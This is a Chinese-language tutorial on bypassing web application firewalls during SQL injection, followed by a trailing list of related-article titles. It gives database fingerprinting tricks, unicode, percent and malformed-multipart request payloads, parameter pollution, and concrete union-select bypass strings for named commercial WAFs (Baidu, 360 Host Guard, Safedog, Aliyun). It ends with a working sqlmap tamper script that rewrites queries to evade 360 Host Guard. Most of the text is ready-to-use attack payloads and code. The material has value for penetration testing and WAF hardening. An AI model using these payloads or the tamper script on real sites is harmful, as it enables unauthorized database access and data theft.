0x0 前言

0x1 注入点检测

0x2 bypass waf

0x3 自动化

0x0 前言

这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波实战,进行一个简单的总结。

0x1 注入点检测

一般的注入还是很好判断的,特别是基于报错,但有的时候略微有些奇葩的环境,再加上一些乱七八糟 waf,就比较难搞了,这里简单总结了一些方法。

利用数据库独有的一些函数

access asc chr len #access-functions

mysql substring substr length

mssql char ascii len substring #mssql function str

oracle ascii chr length substr upper lower replace(x,old,new)

这些数据库中一个通用的函数就是abs,如果觉得是int型注入不妨先试试2-abs(1),然后结合各类数据库的一些函数来判断是什么数据库的注入,当然对数据库了解越多越好。

改变请求方式

根据经验,一般情况下各脚本对http request method如下,这里以GET为例子,针对www.vul.com/?id=1来进行判断。

php GET

aspx GET

asp GET POST COOKIE

jsp GET POST

平常渗透测试中总是遇到各种各样的waf,有的时候一个单引号就死了,这个时候首选的一些方法就是转换请求头了,毕竟GET不如POST,POST不如multipart/form-data,当然不要看到php就不去转换,任何情况下都要尝试一下。

当然,可以用burp很方便的来进行change request method以及change body encoding。

之前碰到过一个有趣的例子,asp的站点可以通过cookie提交数据,而且可以使用len函数,可以初步判断为access或者mssql数据库,但是还是很头疼,最后一位大哥使用下面的函数可以判断成功。www.vul.com/2.asp?id=482

483-chr(chr(52)&chr(57)) #=482

chr(52) '4'

chr(57) '9'

chr(49) '1' #chr(52)&chr(57)为49 chr(49)为1 虽然最后也没什么卵用但还是挺有意思的

数据库特性

mysql 注释符号# --+ ` ;%00 // 字符串可以使用成对的引号'admin' = admin'''

mssql 注释符号-- // ;%00

oracle 注释符号-- /**/ admin=adm'||'in

空白符号

MySQL5 09 0A 0B 0C 0D A0 20

Oracle 00 0A 0D 0C 09 20

MSSQL 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

mysql和mssql可以使用|来进行相关的运算,而oracle会把||当成连接字符。

1. iis+asp(x)

1.%u特性: iis支持对unicode的解析,如:payload为[s%u006c%u0006ect],解析出来后则是[select]

%u0061nd 1=1

另类%u特性: unicode在iis解析之后会被转换成multibyte,但是转换的过程中可能出现:多个widechar可能会转换为同一个字符。

如:select中的e对应的unicode为%u0065,但是%u00f0同样会被转换成为e s%u00f0lect

iis+asp

2.%特性: union selec%t user fr%om dd #iis+asp asp+iis环境下会忽略掉百分号,如:payload为[sele%ct], 解析出来后则是[select]

3.asp/asp.net在解析请求的时候,允许Content-Type: application/x-www-form-urlencoded的数据提交方式select%201%20from%20user

asp/asp.net request解析:

4.在asp和asp.net中获取用户的提交的参数一般使用request包,当使用request(‘id’)的形式获取包的时候,会出现GET,POST分不清的情况,譬如可以构造一个请求包,METHOD为GET,但是包中还带有POST的内容和POST的content-type, 换一种理解方式也就是将原本的post数据包的method改成GET,如果使用request(‘id’)方式获取数据,仍会获取到post的内容

2. php+apache畸形的boundary

1.php在解析multipart data的时候有自己的特性,对于boundary的识别,只取了逗号前面的内容,例如我们设置的boundary为—-aaaa,123456,php解析的时候只识别了—-aaaa,后面的内容均没有识别。然而其他的如WAF在做解析的时候,有可能获取的是整个字符串,此时可能就会出现BYPASS

Content-Type: multipart/form-data; boundary=------,xxxx

Content-Length: 191

------,xxxx

Content-Disposition: form-data; name="img"; filename="img.gif"

GIF89a

------

Content-Disposition: form-data; name="id"

1' union select null,null,flag,null from flag limit 1 offset 1-- -

--------

------,xxxx--

2.畸形method(header头中)

某些apache版本在做GET请求的时候,无论method为何值均会取出GET的内容。如请求的method名为DOTA,依然会返回GET方法的值,即,可以任意替换GET方法为其它值,但仍能有效工作,但如果waf严格按照GET方法取值,则取不到任何内容

3. web应用层

1.双重URL编码: 即web应用层在接受到经过服务器层解码后的参数后,又进行了一次URL解码

2.变换请求方式:

在web应用中使用了统一获取参数的方式: 如php里使用$_REQUEST获取参数,但WAF层如果过滤不全则容易bypass,如,waf层过滤了get/post,但没有过滤cookie,而web应用层并不关心参数是否来自cookie

urlencode和form-data: POST在提交数据的时候有两种方式,第一种方式是使用urlencode的方式提交,第二种方式是使用form-data的方式提交。当我们在测试的时候,如果发现POST提交的数据被过滤掉了,此时可以考虑使用form-data的方式去提交

4. hpp

asp.net + iis:id=1,2,3 #?str=a%27/*&str=*/and/*&str=*/@@version=0--

asp + iis :id=1,2,3

php + apache :id=3

jsp + tomcat :id=1

这里提供一种针对普通检测的方法,大家可自行发挥。

mysql int型: %20%26%201=1 mysql.php?id=1%20%26%201=1

另外在字符型中 'and'1'='1是不需要加空格的,有时候也可以绕过一些waf判断

0x2 bypasswaf

由于mysql的灵活性,这里以mysql绕过为主,针对各大主流waf厂商进行一个测试,主要测试在线版的,本地就安装了一个360主机卫士。

其中http://192.168.44.132/mysql.php?id=1是我本地的一个测试环境

其中下面的绕过都是以fuzz为主,不考虑web容器的特性,尝试绕过联合查询 -1 union select 1,2,3 from dual

百度云加速bypass

union select #filter

from dual #not filted

select from dual #filter

只需要绕过select即可 使用--+aaaaaa%0a可bypass

360主机卫士bypass

发现%23%0aand%230a1=1 可以绕过and 1=1 限制

最后在union select from的时候却绕不过去

直接使用大字符串来fuzz %23-FUZZ-%0a https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt 发现可以成功绕过waf

安全狗bypass

直接搞就行了

当然也可以chunked提交

阿里云

尝试使用自定义变量方式来绕过 @a:=(select @b:=table_namefrom{a information_schema.TABLES }limit 0,1)union select '1',@a

@p:=(select)被过滤 fuzz下p参数使用@$:=(select)可以绕过

union select 1被过滤 使用union%23aa%0a/!select--%01%0a/1,@$,3 可以绕过

发现重点就是绕过表名 select 1 from dual 一些常规的方法测试无果 随便fuzz下注释/!数字/却偶然发现有俩个数据包遗漏

想起了以前乌云上一哥的的一个漏洞https://wooyun.shuimugan.com/bug/view?bug_no=94367

难道是因为访问频率导致遗漏?随即我又进行了一些fuzz fuzz1w到5w数字型的注释 加大线程 发现遗漏了更多

我想测试一下之前的waf挑战赛,发现之前提交的payload已经修复了,而且那个漏洞url无法访问了:( 所以无法确认。

随即我又进行了一些超长字符串的fuzz 简单fuzz1w-10w 以500为step 发现现象更多了 可初步判断存在遗漏

### 0x3 自动化

以360主机卫士为例,编写sqlmap tamper脚本。

正常无waf sqlmap联合查询如下:

开启主机卫士,放到浏览器调试,修改相关payload使其能正常运行。

最后tamper脚本如下:

from lib.core.enums import PRIORITY

from lib.core.settings import UNICODE_ENCODING

__priority__ = PRIORITY.LOW

def dependencies():

pass

def tamper(payload, **kwargs):

"""

Replaces keywords

>>> tamper('UNION SELECT id FROM users')

'1 union%23!@%23$%%5e%26%2a()%60~%0a/*!12345select*/ NULL,/*!12345CONCAT*/(0x7170706271,IFNULL(/*!12345CASt(*/COUNT(*) AS CHAR),0x20),0x7171786b71),NULL/*!%23!@%23$%%5e%26%2a()%60~%0afrOm*/INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e AND table_schema=0x73716c696e6a656374--

"""

if payload:

payload=payload.replace("UNION ALL SELECT","union%23!@%23$%%5e%26%2a()%60~%0a/*!12345select*/")

payload=payload.replace("UNION SELECT","union%23!@%23$%%5e%26%2a()%60~%0a/*!12345select*/")

payload=payload.replace(" FROM ","/*!%23!@%23$%%5e%26%2a()%60~%0afrOm*/")

payload=payload.replace("CONCAT","/*!12345CONCAT*/")

payload=payload.replace("CAST(","/*!12345CAST(*/")

payload=payload.replace("CASE","/*!12345CASE*/")

payload=payload.replace("DATABASE()","database/**/()")

return payload

可以成功获取到相关数据。

其他参考链接如下:

http://www.anquan.us/search?keywords=bypass&content_search_by=by_bugs

http://drops.xmd5.com/static/drops/tips-7883.html

https://xianzhi.aliyun.com/forum/attachment/big_size/wafbypass_sql.pdf

http://drops.xmd5.com/static/drops/papers-4323.html

https://www.cnblogs.com/xiaozi/p/6927348.html

http://swende.se/blog/HTTPChunked.html#

https://xz.aliyun.com/t/1239

http://www.sqlinjectionwiki.com/categories/2/mysql-sql-injection-cheat-sheet/

https://mp.weixin.qq.com/s/S318-e4-eskfRG38HZk_Qw

https://joychou.org/web/nginx-Lua-waf-general-bypass-method.html #nginx lua waf

https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF

https://websec.ca/kb/sql_injection#MySQL_Comment_Out_Query

https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423

mysql注入fuzz字典_sql注入fuzz bypass waf相关推荐

  1. mysql注入fuzz字典_SQL注入常规Fuzz全记录

    前言 本篇文章是在做ctf bugku的一道sql 盲注的题(题目地址:注入题目)中运用了fuzz的思路,完整记录整个fuzz的过程,给师傅们当点心,方便大家加深对web sql注入 fuzz的理解. ...

  2. mysql注入转义绕过_SQL注入防御绕过——宽字节注入

    01 背景知识 字符集 在了解宽字节注入之前,我们先来看一看字符集是什么.字符集也叫字符编码,是一种将符号转换为二进制数的映射关系. 几种常见的字符集: ASCII编码:单字节编码 latin1编码: ...

  3. mysql sql注释符号_SQL注入注释符(#、-- 、/**/)使用条件及其他注释方式的探索

    以MySQL为例,首先我们知道mysql注释符有#.-- (后面有空格)./**/三种,在SQL注入中经常用到,但是不一定都适用.笔者在sqlilabs通关过程中就遇到不同场景用的注释符不同,这让我很 ...

  4. mysql 报错注入 读文件_SQL注入-读写文件

    SQL注入-读取文件 使用函数 load_file("文件路径/名称") 1.读取/etc/passwd 文件(SQL注入只能读取/etc/passwd文件,不能读取其他文件) h ...

  5. mysql sleep详解_sql注入详解(二)

    sql注入详解 4.检测方法 首先是判断能不能进行sql注入 是哪种sql注入 (1)数字型 ?id=1 and 1=1 返回成功?id=1 and 1=2 返回失败 这说明是数字型注入,或者叫整型注 ...

  6. mysql 注入用例_SQL注入漏洞安全测试(WVS/POST型/手工SQL注入)

    1.WVS自动化SQL注入测试 n  测试目的: 测试网站是否存在SQL注入漏洞. n  测试用例: 1)     Scan settings选择sql injection策略: 2)     输入扫 ...

  7. mysql dba盲注_SQL注入学习-Dnslog盲注

    1.基础知识 1.DNS DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的 ...

  8. mysql注入绕过单引号_SQL注入-绕过过滤规则

    过滤规则产生的原因 前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行.这些数据我们 ...

  9. 利用mysql的预编译机制_SQL注入笔记记录+MySQL的事务隔离级别

    (一)SQL注入. 1.如何理解SQL注入? SQL注入是一种将SQL代码添加到输入参数中,传递到SQL服务器解析并执行的一种攻击手法. 2.SQL注入是如何产生的? web开发人员无法保证所有的输入 ...

最新文章

  1. 【转】mssql中大小写的区分
  2. 西安理工大学计算机考研难吗,西安理工大学考研难吗?一般要什么水平才可以进入?...
  3. 第一次冲刺阶段(三)
  4. ubuntu 14.04 环境下打开xls、pdf与png文件
  5. 厉害了!谷歌新发布的半监督学习算法降低4倍错误率
  6. c语言传入的指针无返回值,c语言 关于指针注意事项
  7. python 二重积分_Python机器学习(五十七)SciPy 积分
  8. 报表自动化就是连接数据库?错,它打开了数据仓库的大门
  9. php 给注册加上限制条件,在注册用户时用两个条件限制,该如何处理
  10. 股票分析软件编程开发日记与总结,自动交易软件开发
  11. 电商后台管理系统——JavaWeb项目 毕业设计论文
  12. python打包成exe fail to ex_使用python写的PDF转EXCEL工具,已打包exe
  13. Learning Sites
  14. SQLite数据库版本升级
  15. CODOSYS之结构化文本(ST)—— 初级篇(二)简介与基本概念
  16. 风入松——北大校园的风入松书店不知何处去
  17. 进安全模式提示”Press ENTER to continue loading SPTD.sys”
  18. android ios9 rom,谁说安卓不如苹果?看Android7.0如何逆袭iOS9.3
  19. 计算机主板测试配件,如何检测主板是否有问题_如何诊断主板是否损坏,没有图形步骤...
  20. vmware 提示该虚拟机正在使用中

热门文章

  1. YOLOv6-目标检测论文解读
  2. 计算机方向有哪些细分专业,各专业有什么不同吗?
  3. js点击复制隐藏域值
  4. i.MX6ULL终结者Linux文件系统开发制作最小文件系统镜像
  5. linux etc fstab参数详解,/etc/fstab 详解
  6. htm5新特性新增与弃用元素
  7. Python一分钟实现CSV文件读写
  8. 跨域 已被CORS策略阻止 请求的资源上没有Access-Control-Allow-Origin标头 (使用Access-Control-Allow-Origin解决跨域)
  9. SpringBoot:使用 @Lazy 注解懒加载
  10. python n次幂_python n次幂